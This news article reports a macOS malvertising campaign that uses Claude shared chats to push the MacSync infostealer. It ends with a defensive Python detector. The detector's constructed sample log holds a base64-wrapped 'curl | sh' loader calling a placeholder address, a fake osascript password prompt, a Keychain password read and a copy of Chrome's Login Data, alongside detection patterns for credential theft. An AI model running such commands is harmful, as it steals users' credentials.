Mac users searching for Claude installation help are being targeted by a malvertising campaign that turns Google-sponsored results and legitimate Claude shared-chat pages into a malware delivery route.
The campaign, disclosed on 10 May by security researcher Berk Albayrak, uses search ads whose displayed destination is Anthropic’s real claude.ai domain. Users looking for terms such as “Claude mac download” are led to a shared Claude chat that presents itself as an official “Claude Code on Mac” installation guide and urges them to paste a command into Terminal. That command silently downloads and runs a payload identified as a variant of the MacSync macOS infostealer.
The tactic is significant because it removes one of the clearest warning signs in online fraud: the suspicious domain. The destination shown in the ad is genuine, while the instructions inside the shared chat are attacker-controlled. The lure exploits the normal behaviour of developers and AI-tool users, many of whom are accustomed to copying installation commands from technical documentation.
The malicious instructions use encoded shell commands to retrieve scripts from attacker infrastructure. In one observed case, the loader ran almost entirely in memory, while another variant used separate infrastructure and a different payload. The stolen data can include browser credentials, cookies and macOS Keychain contents, which are then packaged and exfiltrated to the attacker’s server.
MacSync belongs to a wider group of macOS infostealer campaigns using ClickFix-style social engineering, where victims are asked to “fix” or “install” something by running commands themselves. That approach sidesteps the protections that apply to app bundles: an application downloaded in a browser carries a quarantine attribute and is checked by Gatekeeper when it is opened through Finder, whereas a script fetched by a command pasted into Terminal and piped straight into a shell is never written to disk as a quarantined file and triggers no such prompt.
The broader campaign family has also been seen collecting media files, iCloud data, Keychain entries and cryptocurrency wallet keys. Some variants replace legitimate wallet applications with trojanised versions, raising the risk for users who manage digital assets or work from developer machines containing SSH keys, repository tokens and cloud credentials.
The abuse of Claude-themed lures has been building through 2026. Earlier operations used fake Claude Code documentation pages, Squarespace-hosted pages, Google Sites and other user-generated content platforms to mimic trusted technical guidance. Windows users have also been targeted through fake Claude Code-related material and malicious VS Code extensions, though the campaign disclosed on 10 May focuses on macOS users and Claude shared chats.
Claude Code itself is Anthropic’s agentic coding tool, available through official channels for terminal, IDE, desktop app and browser workflows. That popularity makes it an attractive brand for attackers seeking developers, security practitioners and early adopters of AI coding tools. A search query about installing an AI assistant can therefore become the first step in a credential-theft chain.
The campaign also exposes a broader weakness in the trust model around online advertising and shared AI content. Search ads can place malicious instructions above legitimate results, while public AI-generated or shared pages may inherit trust from the platform’s main domain. Users may look at the domain, see a familiar brand and miss small indicators that the content is merely shared material rather than official documentation.
Google has said its advertising systems blocked or removed more than 8.3 billion policy-violating ads and suspended 24.9 million advertiser accounts in 2025, with AI systems helping detect harmful activity before it reaches users. The persistence of these campaigns, however, shows that attackers continue to find gaps by combining verified-looking ads, trusted domains and fast-changing payload infrastructure.
Security teams are being urged to monitor for unusual Terminal activity, encoded shell commands, unexpected osascript execution (in particular password dialogs that imitate system prompts), suspicious outbound connections and attempts to access Keychain or browser credential stores. Users should obtain Claude apps and Claude Code only from official Anthropic documentation, avoid sponsored links for software installation, and treat any webpage asking them to paste a Terminal command as high-risk unless the command has been checked independently against the vendor’s own instructions.
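The following is an added example, written for this page and not code from the article, from the researcher, or from any vendor, showing how the indicators above (encoded shell commands as described earlier in the article, downloads piped into a shell, osascript password prompts, Keychain and browser credential store access) can be checked over process-execution records. The log format (tab-separated timestamp, user, command line), the sample lines, the loader text and the TEST-NET address 203.0.113.10 are all constructed for the example, and the regular expressions are generic heuristics rather than signatures of this campaign. Base64 blobs are decoded and rescanned, so a loader hidden inside an encoded string is still caught.

```python
"""Heuristic detector for ClickFix-style macOS infostealer command lines.

Added example: not from the article or from the researcher's analysis.
Log format, sample lines and indicator patterns are assumptions made here.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

# Generic indicator patterns (assumptions for this example, not campaign signatures).
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
BASE64_DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
# 40+ base64-alphabet characters with optional padding. A 40-char hex git SHA
# also matches, which is why findings are based only on what a blob decodes to.
BASE64_BLOB = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/=])")
OSASCRIPT_PROMPT = re.compile(r"osascript.*?(?:display dialog|with hidden answer)", re.I)
KEYCHAIN = re.compile(r"security\s+(?:find|dump)-[a-z-]+|Library/Keychains", re.I)
BROWSER_STORE = re.compile(r"Login Data|Cookies\b|Local State", re.I)


@dataclass
class Finding:
    line_no: int
    command: str
    indicators: list[str] = field(default_factory=list)


def indicators_for(cmd: str) -> list[str]:
    """Return the names of every indicator that fires on one command string."""
    hits = []
    if DOWNLOADER.search(cmd) and PIPE_TO_SHELL.search(cmd):
        hits.append("download piped to shell")
    if BASE64_DECODE.search(cmd) and PIPE_TO_SHELL.search(cmd):
        hits.append("base64 decode piped to shell")
    if OSASCRIPT_PROMPT.search(cmd):
        hits.append("osascript password prompt")
    if KEYCHAIN.search(cmd):
        hits.append("keychain access")
    if BROWSER_STORE.search(cmd):
        hits.append("browser credential store access")
    return hits


def decode_blobs(cmd: str) -> list[str]:
    """Decode each base64-looking blob in cmd that is valid base64 and UTF-8 text."""
    decoded = []
    for m in BASE64_BLOB.finditer(cmd):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (binascii.Error, ValueError):  # not base64, or not text: skip
            continue
        decoded.append(text)
    return decoded


def scan_command(cmd: str) -> list[str]:
    """Indicators on the command itself plus those found inside decoded blobs."""
    hits = indicators_for(cmd)
    for text in decode_blobs(cmd):
        hits.extend(f"decoded: {h}" for h in indicators_for(text))
    return hits


def scan_log(lines) -> list[Finding]:
    """Scan tab-separated 'timestamp<TAB>user<TAB>command' records; return findings."""
    findings = []
    for n, line in enumerate(lines, 1):
        parts = line.rstrip("\n").split("\t", 2)
        if len(parts) != 3:
            continue  # malformed record: skip rather than crash the scan
        hits = scan_command(parts[2])
        if hits:
            findings.append(Finding(n, parts[2], hits))
    return findings


# Constructed sample log. The encoded blob wraps a one-line loader that fetches a
# script from a TEST-NET address and pipes it into sh, mimicking the in-memory
# loader style described in the article. Only line 1 and line 6 are benign.
_LOADER = b"curl -fsSL http://203.0.113.10/loader.sh | sh"
_BLOB = base64.b64encode(_LOADER).decode()
SAMPLE_LOG = [
    "2026-05-10T09:12:01Z\tdev\tgit checkout 3f786850e387550fdab836ed7e6dc881de23001b",
    f"2026-05-10T09:14:33Z\tdev\techo {_BLOB} | base64 -d | bash",
    "2026-05-10T09:14:35Z\tdev\tosascript -e 'display dialog \"macOS needs your password\" default answer \"\" with hidden answer'",
    "2026-05-10T09:14:40Z\tdev\tsecurity find-generic-password -ga 'Chrome Safe Storage'",
    "2026-05-10T09:14:41Z\tdev\tcp \"$HOME/Library/Application Support/Google/Chrome/Default/Login Data\" /tmp/.ld",
    "2026-05-10T09:20:00Z\tdev\tbrew install --cask claude",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {', '.join(f.indicators)}")
```

On the sample log the detector flags lines 2 to 5 and leaves the git checkout and the Homebrew install alone; the encoded line is reported twice, once for the `base64 -d | bash` pipeline itself and once for the `curl ... | sh` loader recovered from the blob. In practice the command lines would come from an EDR process-execution feed or from shell history, and the patterns would be tuned to the environment, since developer machines legitimately pipe installers into a shell more often than most fleets.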
Follow Arabian Post